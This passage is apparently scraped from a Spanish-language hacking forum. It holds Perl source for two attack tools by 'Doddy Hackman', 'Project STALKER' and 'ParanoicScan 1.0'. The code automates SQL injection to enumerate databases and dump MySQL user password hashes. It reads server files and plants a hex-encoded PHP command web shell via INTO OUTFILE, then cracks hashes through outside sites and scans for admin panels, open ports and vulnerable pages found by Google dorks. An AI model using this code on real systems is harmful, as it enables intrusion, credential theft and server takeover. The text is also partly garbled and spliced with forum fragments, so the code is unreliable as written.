&schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($rta =~/othercolumn (.*) (.*)/){ my ($db,$table) = ($1,$2); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($rta =~/mysqluser/) { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($rta=~/logs/) { $t = "logs/webs/$save.txt"; &reload; } next; } elsif($rta=~/createshell/) { print "\n\n[Full Path Discloure] : "; chomp(my $path = <STDIN>); &into($_[0],$_[1],$path,$save); } elsif($rta=~/readfile/) { loadfile($_[0],$_[1],$save); } elsif ($rta=~/dumper (.*) (.*) (.*)/) { my ($tabla,$col1,$col2) = ($1,$2,$3); &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($rta =~/details/) { &details($_[0],$_[1],$save); &reload; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; } } sub reload { &menu_options($_[0]); } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass); $page=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n"); $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),schema_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { print "[-] information_schema = ERROR\n"; } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($_[3].".txt","[Table $real Found : $table ]"); print "[Table $real Found : $table ]\n"; $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { print "\n[-] information_schema = ERROR\n"; } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass); $page =~s/hackman /concat (char (82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $cop1 =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $cop =~s/hackman /unhex (hex(concat (0x524154535850444f574e ,Host ,0x524154535850444f574e ,User ,0x524154535850444f574e ,Password ,0x524154535850444f574e )))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { print "\n[-] mysql.user = ERROR\n\n"; } } savefile($_[5].".txt","\n"); my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; print "\n\n[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; print "[+] Table : $_[3]\n"; print "[+] Length of the rows : $tota\n\n"; print "[$_[1]] [$_[2]]\n\n"; savefile($_[5].".txt","[Table] : $_[3]"); savefile($_[5].".txt","[+] Length of the rows: $tota\n"); savefile($_[5].".txt","[$_[1]] [$_[2]]\n"); for my $limit(0..$tota) { $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2); if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) { savefile($_[5].".txt","[$_[1]] : $1 [$_[2]] : $2"); print "[$_[1]] : $1 [$_[2]] : $2\n"; } else { print "\n\n[+] Extracting Finish\n\n"; last; &reload; } } } else { print "[-] Not Found any DATA\n\n"; }}} sub loadfile { savefile($_[2].".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); if ($_[0] =~/(.*)hackman(.*)/g) { my $start = $1; my $end = $2; print "\n\n[+] File to read : "; chomp (my $file = <stdin>); $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))"; my $code = toma($start.$concat.$end.$pass2); if ($code=~/k0bra (.*)k0bra /s) { print "[File Found] : $file\n"; print "\n[Source Start]\n\n"; print "\n\n[Source End]\n\n"; savefile($_[2].".txt","[File Found] : $file"); savefile($_[2].".txt","\n[Source Start]\n"); savefile($_[2].".txt","$1"); savefile($_[2].".txt","\n[Source End]\n"); }} &reload; } sub into { print "\n\n[Status] : Injecting a SQLI for create a shell\n\n"; my ($page,$bypass,$dir,$save) = @_; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); my ($scheme, $auth, $path, $query, $frag) = uri_split($page); if ($path=~/\/(.*)$/) { my $path1 = $1; my $path2 = $path1; $shell = $dir."/"."shell.php"; if ($page =~/(.*)hackman(.*)/ig) { my ($start,$end) = ($1,$2); $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2); $code1 = toma("http://".$auth."/".$path2."/"."shell.php"); if ($code1=~/Mini Shell By Doddy/ig) { print "[shell up] : http://".$auth."/".$path2."/"."shell.php\a"; savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php"); } else { print "[shell] : Not Found\n"; } } } &reload; } sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub base { $re = encode_base64($_[0]); } sub base_de { $re = decode_base64($_[0]); } sub download { if ($nave->mirror($_[0],$_[1])) { if (-f $_[1]) { }}} sub hex_en { my $string = $_[0]; $hex = '0x'; } } sub hex_de { $text =~ s/^0x//; } sub ascii_de { } sub getprocess { my %procesos; my $uno = Win32::OLE->new("WbemScripting.SWbemLocator"); my $dos = $uno->ConnectServer("","root\\cimv2"); foreach my $pro (in $dos->InstancesOf("Win32_Process")){ $procesos{$pro->{Caption}} = $pro->{ProcessId}; } } sub killprocess { my ($numb,$pid) = @_; if (Win32::Process::KillProcess($pid,$numb)) { } else { } } sub getip { } sub crackit { my $secret = $_[0]; print "[+] Cracking $_[0]\n\n"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\ /div ><div class ="result">$_[0]:(.+)<br\ />), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí : <b>(.*)<\ /b ><br><form action =\ "\">), } ); for my $data(keys %hash) { if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { print "\n[+] Decoded : ".$1."\n\n"; saveyes("logs/pass-found.txt",$secret.":".$1); } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { saveyes("logs/pass-found.txt",$secret.":".$1); } } } print "\n[+] Finish\n"; } sub ftp { my ($ftp,$user,$pass) = @_; if (my $socket = Net::FTP->new($ftp)) { if ($socket->login($user,$pass)) { print "\n[+] Enter of the server FTP\n\n"; menu: print "\n\nftp>"; chomp (my $cmd = <stdin>); print "\n\n"; if ($cmd=~/help/) { print q( help : show information cd : change directory <dir> dir : list a directory mdkdir : create a directory <dir> rmdir : delete a directory <dir> pwd : directory del : delete a file <file> rename : change name of the a file <file1> <file2> size : size of the a file <file> put : upload a file <file> get : download a file <file> cdup : change dir <dir> exit : ?? ); } if ($cmd=~/dir/ig) { if (my @files = $socket->dir()) { for(@files) { print "[+] ".$_."\n"; } } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/pwd/ig) { print "[+] Path : ".$socket->pwd()."\n"; } if ($cmd=~/cd (.*)/ig) { if ($socket->cwd($1)) { print "[+] Directory changed\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/cdup/ig) { if (my $dir = $socket->cdup()) { print "\n\n[+] Directory changed\n\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/del (.*)/ig) { if ($socket->delete($1)) { print "[+] File deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rename (.*) (.*)/ig) { if ($socket->rename($1,$2)) { print "[+] File Updated\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/mkdir (.*)/ig) { if ($socket->mkdir($1)) { print "\n\n[+] Directory created\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/rmdir (.*)/ig) { if ($socket->rmdir($1)) { print "\n\n[+] Directory deleted\n"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/exit/ig) { next; } if ($cmd=~/get (.*) (.*)/ig) { print "\n\n[+] Downloading file\n\n"; if ($socket->get($1,$2)) { print "[+] Download completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/put (.*) (.*)/ig) { print "\n\n[+] Uploading file\n\n"; if ($socket->put($1,$2)) { print "[+] Upload completed"; } else { print "\n\n[-] Error\n\n"; } } if ($cmd=~/quit/) { next; } goto menu; } else { print "\n[-] Failed the login\n\n"; } } else { print "\n\n[-] Error\n\n"; } } sub scanpaths { my $urla = $_[0]; print "\n[+] Find paths in $urla\n\n\n"; my @urls = repes(get_links(toma($urla))); for $url(@urls) { my $web = $url; my ($scheme, $auth, $path, $query, $frag) = uri_split($url); if ($_[0] =~/$auth/ or $auth eq "") { if ($path=~/(.*)\/(.*)\.(.*)$/) { my $borrar = $2.".".$3; if ($web=~/(.*)$borrar/) { my $co = $1; unless ($co=~/$auth/) { $co = $urla.$co; } $code = toma($co); if ($code=~/Index Of/ig) { print "[Link] : ".$co."\n"; saveyes("logs/paths-found.txt",$co); }}}}}} sub scanport { my %ports = ("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } print "\n\n[+] Finish\n"; } sub scanpanel { print "[+] Scanning $_[0]\n\n\n"; for $path(@panels) { $code = tomax($_[0]."/".$path); if ($code->is_success) { print "[Link] : ".$_[0]."/".$path."\n"; saveyes("logs/panel-logs.txt",$_[0]."/".$path); } } print "\n\n[+] Finish\n"; } sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { push(@url,$l); } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { push(@founds,$2); } } my @founds = repes(@founds); return @founds; } sub sql { my ($pass1,$pass2) = ("+","--"); my $page = shift; $code1 = toma($page."-1".$pass1."union ".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; saveyes("logs/sql-logs.txt",$page); }} sub get_links { $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); return @links; sub agarrar { my ($a,%b) = @_; push(@links,values %b); } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } return @limpio; } sub head { cprint "\x0311"; #13 print "\n\n-- == Project STALKER == --\n\n"; cprint "\x030"; } sub copyright { cprint "\x0311"; #13 print"\n\n(C) Doddy Hackman 2011\n\n"; cprint "\x030"; } sub toma { return $nave->get($_[0])->content; } sub tomax { return $nave->get($_[0]); } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } sub conectar { my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1], Proto => "tcp",Timeout => 5); print $sockex $_[2]."\r\n"; $sockex->read($re,5000); $sockex->close; return $re."\r\n"; } sub enter { my ($host,$user,$pass) = @_; print "[+] Connecting to the server\n"; $info = "dbi:mysql::".$host.":3306"; if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) { print "\n[+] Enter in the database"; while(1) { print "\n\n\n[+] Query : "; chomp(my $ac = <stdin>); $enter->disconnect; print "\n\n[+] Closing connection\n\n"; last; } $re = $enter->prepare($ac); $re->execute(); my $total = $re->rows(); my @columnas = @{$re->{NAME}}; if ($total eq "-1") { print "\n\n[-] Query Error\n"; next; } else { print "\n\n[+] Result of the query\n"; if ($total eq 0) { print "\n\n[+] Not rows returned\n\n"; } else { print "\n\n[+] Rows returned : ".$total."\n\n\n"; for(@columnas) { print $_."\t\t"; } print "\n\n"; while (@row = $re->fetchrow_array) { for(@row) { print $_."\t\t"; } print "\n"; }}}} } else { print "\n[-] Error connecting\n"; }} sub encode { my $string = $_[0]; $hex = '0x'; for (split //,$string) { $hex .= sprintf "%x", ord; } return $hex; } sub saveyes { open (SAVE,">>".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub savefile { open (SAVE,">>logs/webs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub coleccionar { opendir DIR,$_[0]; my @archivos = readdir DIR; close DIR; return @archivos; } sub helpme { cprint "\x0310"; #13 print qq( Commands : getip <host> getlink <page> getprocess killprocess <name process> <pid process> conec <host> <port> <command> allow <host> paths <page> encodehex <text> decodehex <text> encodeascii <text> decodeascii <text> encodebase <text> decodebase <text> scanport <host> panel <page> getpass <hash> kobra <page> ftp <host> <user> <pass> mysql <host> <user> <pass> navegator scangoogle help exit ); cprint "\x030"; } # # The End ? #
|
|
|
|
|
436
|
Programación / Scripting / [Perl] ParanoicScan 1.0
|
en: 3 Diciembre 2011, 16:32 pm
|
Lo mismo que la anterior version solo se le agrego un buscado de paneladmin y una nueva opcion para buscar listado de directorios en las paginas que estamos escaneando #!usr/bin/perl #Paranoic Scan 1.0 Updated #(c)0ded by Doddy H 2011 # #Search in google with a dork #Scan type : # #XSS #Full Source Discloure #LFI #RFI #SQL GET & POST + admin #Directory listing #MSSQL #Oracle #Jet Database #Find HTTP Options y Server nAME # # use LWP::UserAgent; use HTML::LinkExtor; use HTML::Form; use URI ::Split qw(uri_split ); use IO::Socket; my @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); installer(); sta(); sub sta { sub head { @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ ); } &menu; sub menu { &head; print "[a] : Scan a File\n"; print "[b] : Search in google and scan the webs\n\n"; if ($op =~/a/ig) { print "\n[+] Wordlist : "; chomp(my $word = <STDIN>); my @paginas = repes(cortar(savewords($word))); my $option = &men; print "\n\n[+] Opening File\n"; scan($option,@paginas); } elsif ($op=~/b/ig) { chomp(my $dork = <STDIN>); chomp(my $pag = <STDIN>); my $option = &men; print "\n\n[+] Searching in google\n"; my @paginas = &google($dork,$pag); scan($option,@paginas); } else { &menu; } } sub scan { my ($option,@webs) = @_; print "\n\n[Status] : Scanning\n"; print "[Webs Count] : ".int(@webs)."\n\n"; for(@webs) { if ($option=~/S/ig) { scansql($_); } if ($option=~/K/ig) { sql($_); } if ($option=~/Q/ig) { sqladmin($_); } if ($option=~/Y/ig) { simple($_); } if ($option=~/L/ig) { lfi($_); } if ($option=~/R/ig) { rfi($_); } if ($option=~/F/ig) { fsd($_); } if ($option=~/X/ig) { scanxss($_); } if ($option=~/M/ig) { mssql($_); } if ($option=~/J/ig) { access($_); } if ($option=~/O/ig) { oracle($_); } if ($option=~/HT/ig) { http($_); } if ($option=~/A/ig) { scansql($_); scanxss($_); mssql($_); access($_); oracle($_); lfi($_); rfi($_); fsd($_); http($_); } } } print "\n\n[Status] : Finish\n"; &finish; } sub toma { return $nave->get($_[0])->content; } sub tomaz { } sub savefile { open(SAVE ,">>logs/".$_[0]); } sub finish { print "\n\n\n(C) Doddy Hackman 2010\n\n"; <STDIN>; sta(); } sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { } } my @founds = repes(cortar(@founds)); } sub sql { my ($pass1,$pass2) = ("+","--"); $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; savefile("sql-logs.txt",$page); }} sub sqladmin { my ($pass1,$pass2) = ("+","--"); $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "\n[+] SQLI : $page\a\n"; savefile("sql-logs.txt",$page); my ($scheme, $auth, $path, $query, $frag) = uri_split($page); my $fage = "http://".$auth; for $path(@panels) { $code = tomaz($fage."/".$path); if ($code->is_success) { print "[+] Link : ".$fage."/".$path."\n"; savefile("admin-logs.txt",$fage."/".$path); }}}} sub http { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $socket = IO::Socket::INET->new( PeerAddr=>$auth, PeerPort=>"80", Proto=>"tcp"); print $socket "OPTIONS / HTTP/1.0\r\n\r\n"; read $socket,$resultado,"1000"; if ($resultado=~/Server:(.*)/g) { my $server = $1; savefile("http-logs.txt","[+] Page : $auth"."\n"); savefile("http-logs.txt","[+] Server : ".$server."\n"); } if ($resultado=~/Allow: (.*)/g) { my $options = $1; savefile("http-logs.txt","[+] Options : ".$options."\n"); } $socket->close; } sub scanxss { my @testar = 